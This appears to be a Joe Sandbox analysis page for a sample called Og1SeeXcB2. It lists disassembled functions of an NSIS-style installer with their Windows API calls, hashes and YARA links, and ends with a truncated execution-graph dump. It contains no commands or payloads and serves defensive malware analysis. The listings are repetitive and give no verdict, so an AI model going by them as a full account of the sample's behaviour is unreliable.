                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                                                                                                  • Opcode ID: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                                                                                                                                                                                  • Instruction ID: cb146776896af08e1a0fdef995d2a06b2a54ad4518ff1494983f568d8b9f1051
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F05E31606621EBC6716F10FE0CA8B7BA5FB44B42B52487AF441B11E5D7B608829BAD
                                                                                                                                                                                                                                  Function 00405DB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                                                                                                                                                    • Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
                                                                                                                                                                                                                                    • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
                                                                                                                                                                                                                                    • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E11
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405E21
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DB8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                  • API String ID: 3248276644-3081826266
                                                                                                                                                                                                                                  • Opcode ID: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
                                                                                                                                                                                                                                  • Instruction ID: 2671ab18330f60560c3719f84a1496f0714d5bb9fce48f62cd6cce0e1185a57b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAF0F935108E6156D621333A6D0D6AF2504CE82364756853FFC52B12D5DF3C89539DBE
                                                                                                                                                                                                                                  Function 004053B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 004053E6
                                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405437
                                                                                                                                                                                                                                    • Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                  • Opcode ID: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                                                                                                                                                                                  • Instruction ID: da482bbf0ee2bc432bcdf1377e528ba943c285c76ef4d04d2afca056141c401e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E01B131200608ABDF314F11ED81B9B3629EB84752F608037FA01752D1C7798DD29E69
                                                                                                                                                                                                                                  Function 004062A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,004226E8,00000000,?,?,: Completed,?,?,00406538,80000002), ref: 004062EF
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00406538,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,004226E8), ref: 004062FA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                                                                                                  • String ID: : Completed
                                                                                                                                                                                                                                  • API String ID: 3356406503-2954849223
                                                                                                                                                                                                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                                                                                  • Instruction ID: ae085d710551058a7f2532bbeea434883cb59e3c9f2bcee9d1549068d4bd9198
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9015A72500209EADF218F51CC09EDB3BA8EF95364F01803AFD1AA6190D738D968DFA4
                                                                                                                                                                                                                                  Function 004059C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004059FA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Error launching installer, xrefs: 004059D7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                  • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                                                                                  • Instruction ID: 20697c874bd4b9c747bb4d9041eb299060a3c9f0112610a55a8a246a05e7abf4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DE0BFB46002097FEB109B64ED45F7B77ACEB04708F414966BD50F6150DB7499158E7C
                                                                                                                                                                                                                                  Function 00403A15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004039ED,00403803,00000007,?,00000007,00000009,0000000B), ref: 00403A2F
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00403A36
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A15
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                  • API String ID: 1100898210-3081826266
                                                                                                                                                                                                                                  • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                                                                                  • Instruction ID: e31a7033e06264a748858091d27326a34299cb79b9d6c3cb96cb008d14d5ef43
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53E0EC36A511205BC7219F45AA0875E7BADAF58B22F05012AE8857B27087745C824F98
                                                                                                                                                                                                                                  Function 00405CFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D02
                                                                                                                                                                                                                                  • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D12
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                  • API String ID: 2709904686-224404859
                                                                                                                                                                                                                                  • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                                                                                                                                                  • Instruction ID: 6b3ae82466a78d2b10de00fa1d507c540e6bf26c2d05194e9d44ea340b0cb8a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48D05EB24109209AC3126705EC089AF67A8EF5130074A842BF841A61A5D7785C8186AC
                                                                                                                                                                                                                                  Function 00405E36 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E5E
                                                                                                                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6F
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                                                                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                  • Instruction ID: 98c30faecf84a4e678f1c8c5aee25e578da6ba24d366b38437dab149ad6906fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF06232504458FFD7029BA5DD04DAEBBA8EF16354B2540AAE884F7210D674EF01DBA9

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:3.5%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:3.6%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:112
                                                                                                                                                                                                                                  execution_graph 102796 991098 102801 995fc8 102796->102801 102800 9910a7 102822 99bf73 102801->102822 102805 99602c 102809 996062 102805->102809 102839 99adf4 102805->102839 102807 996056 102843 9955dc 102807->102843 102810 99611c GetCurrentProcess IsWow64Process 102809->102810 102817 9d5224 102809->102817 102811 996138 102810->102811 102812 9d5269 GetSystemInfo 102811->102812 102813 996150 LoadLibraryA 102811->102813 102814 99619d GetSystemInfo 102813->102814 102815 996161 GetProcAddress 102813->102815 102816 996177 102814->102816 102815->102814 102818 996171 GetNativeSystemInfo 102815->102818 102819 99617b FreeLibrary 102816->102819 102820 99109d 102816->102820 102818->102816 102819->102820 102821 9b0413 29 API calls __onexit 102820->102821 102821->102800 102847 9b017b 102822->102847 102824 99bf88 102856 9b014b 102824->102856 102826 995fdf GetVersionExW 102827 998577 102826->102827 102828 9d6610 102827->102828 102829 998587 _wcslen 102827->102829 102830 99adf4 8 API calls 102828->102830 102832 99859d 102829->102832 102833 9985c2 102829->102833 102831 9d6619 102830->102831 102831->102831 102871 9988e8 8 API calls 102832->102871 102835 9b014b 8 API calls 102833->102835 102837 9985ce 102835->102837 102836 9985a5 __fread_nolock 102836->102805 102838 9b017b 8 API calls 102837->102838 102838->102836 102840 99ae0b __fread_nolock 102839->102840 102841 99ae02 102839->102841 102840->102807 102841->102840 102872 99c2c9 102841->102872 102844 9955ea 102843->102844 102845 99adf4 8 API calls 102844->102845 102846 9955fe 102845->102846 102846->102809 102848 9b014b ___std_exception_copy 102847->102848 102849 9b016a 102848->102849 102851 9b016c 102848->102851 102865 9b521d 7 API calls 2 library calls 102848->102865 102849->102824 102852 9b09dd 102851->102852 102866 9b3614 RaiseException 102851->102866 102867 9b3614 RaiseException 102852->102867 102854 9b09fa 102854->102824 102858 9b0150 ___std_exception_copy 102856->102858 102857 9b016a 102857->102826 102858->102857 102861 9b016c 102858->102861 102868 9b521d 7 API calls 2 library calls 102858->102868 102860 9b09dd 102870 9b3614 RaiseException 102860->102870 102861->102860 102869 9b3614 RaiseException 102861->102869 102864 9b09fa 102864->102826 102865->102848 102866->102852 102867->102854 102868->102858 102869->102860 102870->102864 102871->102836 102873 99c2d9 __fread_nolock 102872->102873 102874 99c2dc 102872->102874 102873->102840 102875 9b014b 8 API calls 102874->102875 102876 99c2e7 102875->102876 102877 9b017b 8 API calls 102876->102877 102877->102873 102878 99105b 102883 9952a7 102878->102883 102880 99106a 102914 9b0413 29 API calls __onexit 102880->102914 102882 991074 102884 9952b7 __wsopen_s 102883->102884 102885 99bf73 8 API calls 102884->102885 102886 99536d 102885->102886 102915 995594 102886->102915 102888 995376 102922 995238 102888->102922 102895 99bf73 8 API calls 102896 9953a7 102895->102896 102943 